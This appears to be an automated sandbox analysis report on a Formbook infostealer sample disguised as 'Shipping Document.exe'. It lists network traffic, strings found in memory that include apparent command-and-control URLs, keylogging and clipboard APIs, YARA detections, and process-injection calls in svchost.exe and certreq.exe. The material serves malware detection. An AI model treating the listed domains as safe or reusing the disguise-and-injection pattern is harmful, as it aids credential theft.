            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.y94hr.top
            Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.y94hr.top/opfh/
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fasthosts.co.uk/
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
            Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033jv
            Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: certreq.exe, 00000004.00000003.1862123042.0000000008655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
            Source: certreq.exe, 00000004.00000002.3986547187.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
            Source: certreq.exe, 00000004.00000002.3986547187.000000000656C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003C4C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fruitique.co.uk/opfh/?R40L6=gmtcV0/XP16HFJIc
            Source: certreq.exe, 00000004.00000002.3986547187.00000000063DA000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000066FE000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000071FC000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000006D46000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.00000000048DC000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004426000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003DDE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0103425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0103425A
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01034458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_01034458
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0103425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0103425A
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01020219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_01020219
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0104CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0104CDAC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: This is a third-party compiled AutoIt script.1_2_00FC3B4C
            Source: Shipping Document.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Shipping Document.exe, 00000001.00000000.1497721067.0000000001075000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d85c0d4-d
            Source: Shipping Document.exe, 00000001.00000000.1497721067.0000000001075000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b523132b-3
            Source: Shipping Document.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_170db0d5-2
            Source: Shipping Document.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4feae052-c
            Source: initial sampleStatic PE information: Filename: Shipping Document.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042ACA3 NtClose,2_2_0042ACA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055835C0 NtCreateMutant,LdrInitializeThunk,4_2_055835C0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05584650 NtSuspendThread,LdrInitializeThunk,4_2_05584650
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05584340 NtSetContextThread,LdrInitializeThunk,4_2_05584340
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582D10 NtMapViewOfSection,LdrInitializeThunk,4_2_05582D10
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_05582D30
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582DD0 NtDelayExecution,LdrInitializeThunk,4_2_05582DD0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05582DF0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05582C70
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582C60 NtCreateKey,LdrInitializeThunk,4_2_05582C60
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_05582CA0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582F30 NtCreateSection,LdrInitializeThunk,4_2_05582F30
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582FE0 NtCreateFile,LdrInitializeThunk,4_2_05582FE0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582FB0 NtResumeThread,LdrInitializeThunk,4_2_05582FB0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582EE0 NtQueueApcThread,LdrInitializeThunk,4_2_05582EE0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_05582E80
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055839B0 NtGetContextThread,LdrInitializeThunk,4_2_055839B0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582B60 NtClose,LdrInitializeThunk,4_2_05582B60
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_05582BF0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582BE0 NtQueryValueKey,LdrInitializeThunk,4_2_05582BE0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_05582BA0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582AD0 NtReadFile,LdrInitializeThunk,4_2_05582AD0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582AF0 NtWriteFile,LdrInitializeThunk,4_2_05582AF0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05583010 NtOpenDirectoryObject,4_2_05583010
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05583090 NtSetValueKey,4_2_05583090
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05583D70 NtOpenThread,4_2_05583D70
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05583D10 NtOpenProcessToken,4_2_05583D10
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582D00 NtSetInformationFile,4_2_05582D00
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582DB0 NtEnumerateKey,4_2_05582DB0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582C00 NtQueryInformationProcess,4_2_05582C00
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582CC0 NtQueryVirtualMemory,4_2_05582CC0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582CF0 NtOpenProcess,4_2_05582CF0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582F60 NtCreateProcessEx,4_2_05582F60
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582F90 NtProtectVirtualMemory,4_2_05582F90
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582FA0 NtQuerySection,4_2_05582FA0
